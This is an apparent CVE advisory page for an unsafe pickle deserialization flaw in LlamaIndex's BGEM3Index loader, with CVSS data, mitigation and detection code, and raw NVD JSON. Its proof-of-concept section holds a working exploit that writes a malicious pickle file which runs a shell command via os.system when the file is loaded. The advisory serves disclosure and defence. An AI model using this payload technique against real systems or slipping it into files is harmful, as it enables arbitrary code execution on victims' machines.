CVE-2024-14021

Description

LlamaIndex (run-llama/llama_index) versions up to and including 0.11.6 contain an unsafe deserialization vulnerability in BGEM3Index.load_from_disk() in llama_index/indices/managed/bge_m3/base.py. The function uses pickle.load() to deserialize multi_embed_store.pkl from a user-supplied persist_dir without validation. An attacker who can provide a crafted persist directory containing a malicious pickle file can trigger arbitrary code execution when the victim loads the index from disk.
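One common way to reduce exposure to this class of bug is to restrict which globals an unpickler may resolve, following the "Restricting Globals" pattern in the Python pickle documentation. The sketch below illustrates that pattern only; it is not the project's actual fix, and the names ALLOWED_GLOBALS, RestrictedUnpickler and restricted_loads, as well as the allow-list contents, are assumptions made for this example.

```python
import io
import pickle

# Hypothetical allow-list: a real one depends on what the store legitimately holds.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside the allow-list."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Deserialize bytes while rejecting references to non-allow-listed globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers of primitives load normally, while a payload that references a callable such as os.system is rejected before it can be invoked. Formats that cannot encode callables at all (for example JSON) avoid the problem more thoroughly when the data permits.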

CVSS Details

CVSS Score: 7.8

Severity: HIGH

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
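The 7.8 score follows from the vector by the CVSS v3.1 base-score equations. The sketch below reproduces that arithmetic for Scope: Unchanged vectors only; the metric weights and rounding rule are taken from the CVSS v3.1 specification, and the function names are chosen for this example.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR weights are for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place as defined in CVSS v3.1 Appendix A."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score of a CVSS v3.1 vector with Scope: Unchanged."""
    # Skip the "CVSS:3.1" prefix and map each metric to its value letter.
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    if parts["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {metric: WEIGHTS[metric][parts[metric]] for metric in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # prints 7.8
```

For this vector the exploitability sub-score is about 1.83 and the impact sub-score about 5.87, which agree with the 1.8 and 5.9 reported in the raw record.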

Configurations (Affected Products)

cpe:2.3:a:llamaindex:llamaindex:*:*:*:*:*:*:*:* - VULNERABLE

LlamaIndex (run-llama/llama_index) <= 0.11.6
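The affected range can be checked with a simple version comparison. This is a minimal sketch: parse_version and is_affected are hypothetical helpers, only plain numeric versions such as "0.11.6" are handled, and deciding which installed distribution's version string to pass in is left to the reader.

```python
# Last affected release according to this advisory.
LAST_AFFECTED = (0, 11, 6)


def parse_version(text):
    """Turn a plain 'X.Y.Z' string into a tuple of ints (no pre-release suffixes)."""
    return tuple(int(part) for part in text.split(".")[:3])


def is_affected(installed_version):
    """Return True when the version falls at or below the last affected release."""
    return parse_version(installed_version) <= LAST_AFFECTED
```

For example, is_affected("0.11.6") is true and is_affected("0.11.7") is false.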

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

"""
CVE-2024-14021 PoC - LlamaIndex BGEM3Index Unsafe Deserialization
This PoC demonstrates how a malicious pickle file can trigger RCE.
"""

import os
import pickle

# Pickle payload: unpickling it invokes the callable returned by __reduce__
# The command below is a harmless marker that records the current user
class MaliciousPayload:
    def __reduce__(self):
        # Marker command; its output file shows that code ran during deserialization
        cmd = "whoami > /tmp/pwned.txt"
        return (os.system, (cmd,))

def create_malicious_pickle(output_path):
    """Create a malicious pickle file for exploitation"""
    malicious_obj = MaliciousPayload()
    
    # Serialize the malicious object
    pickle_data = pickle.dumps(malicious_obj)
    
    # Create persist_dir structure
    os.makedirs(output_path, exist_ok=True)
    
    # Write the malicious pickle file
    pickle_path = os.path.join(output_path, 'multi_embed_store.pkl')
    with open(pickle_path, 'wb') as f:
        f.write(pickle_data)
    
    print(f"[+] Malicious pickle file created at: {pickle_path}")
    return pickle_path

def exploit(target_persist_dir):
    """
    Simulate the vulnerable load path by unpickling the file directly.
    In a real attack, the victim would call BGEM3Index.load_from_disk(target_persist_dir).
    """
    pickle_path = os.path.join(target_persist_dir, 'multi_embed_store.pkl')
    
    if os.path.exists(pickle_path):
        print(f"[*] Loading pickle from: {pickle_path}")
        with open(pickle_path, 'rb') as f:
            # Unpickling calls the callable returned by __reduce__, so the command runs here
            pickle.load(f)
            print("[!] Pickle loaded successfully")

if __name__ == "__main__":
    # Create malicious persist directory
    malicious_dir = "./malicious_persist_dir"
    create_malicious_pickle(malicious_dir)
    
    print("\n[*] To exploit, victim would call:")
    print(f"    BGEM3Index.load_from_disk('{malicious_dir}')")
    print("\n[!] This PoC is for educational purposes only!")
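A file like the one produced above can be triaged without executing it, because pickletools.genops from the standard library walks the opcode stream without running it. The sketch below flags opcodes that import globals or call objects; the opcode set and the name suspicious_opcodes are choices made for this example. Legitimate pickles of class instances also use these opcodes, so a hit is a reason to refuse or inspect an untrusted file, not proof of malice.

```python
import pickle
import pickletools

# Opcodes that resolve importable names or invoke callables during unpickling.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
    "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def suspicious_opcodes(data: bytes):
    """Return the names of suspicious opcodes found in a pickle, without loading it."""
    found = set()
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.add(opcode.name)
    return found


# A dict of plain values needs none of the flagged opcodes.
print(suspicious_opcodes(pickle.dumps({"a": [1, 2]})))
```

Running the same function over the bytes of multi_embed_store.pkl before any load call would surface the global lookup and REDUCE call that a __reduce__-based payload relies on.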

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-14021
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-14021
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-14021/
[4] VulDB https://vuldb.com/cve/CVE-2024-14021
[5] https://github.com/run-llama/llama_index
[6] https://huntr.com/bounties/ab4ceeb4-aa85-4d1c-aaca-4eda1b71fc12
[7] https://www.llamaindex.ai/
[8] https://www.vulncheck.com/advisories/llamaindex-bgem3index-unsafe-deserialization

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-14021", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:51.413", "lastModified": "2026-01-15T22:39:58.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LlamaIndex (run-llama/llama_index) versions up to and including 0.11.6 contain an unsafe deserialization vulnerability in BGEM3Index.load_from_disk() in llama_index/indices/managed/bge_m3/base.py. The function uses pickle.load() to deserialize multi_embed_store.pkl from a user-supplied persist_dir without validation. An attacker who can provide a crafted persist directory containing a malicious pickle file can trigger arbitrary code execution when the victim loads the index from disk."}, {"lang": "es", "value": "Las versiones de LlamaIndex (run-llama/llama_index) hasta la 0.11.6 inclusive contienen una vulnerabilidad de deserialización insegura en BGEM3Index.load_from_disk() en llama_index/indices/managed/bge_m3/base.py. La función utiliza pickle.load() para deserializar multi_embed_store.pkl de un persist_dir proporcionado por el usuario sin validación. 
Un atacante que pueda proporcionar un directorio persist_dir manipulado que contenga un archivo pickle malicioso puede desencadenar la ejecución de código arbitrario cuando la víctima carga el índice desde el disco."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": 
"LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:llamaindex:llamaindex:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.6", "matchCriteriaId": "C03B86D9-3F03-496D-A803-B1DC212F8FBF"}]}]}], "references": [{"url": "https://github.com/run-llama/llama_index", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://huntr.com/bounties/ab4ceeb4-aa85-4d1c-aaca-4eda1b71fc12", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.llamaindex.ai/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/llamaindex-bgem3index-unsafe-deserialization", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}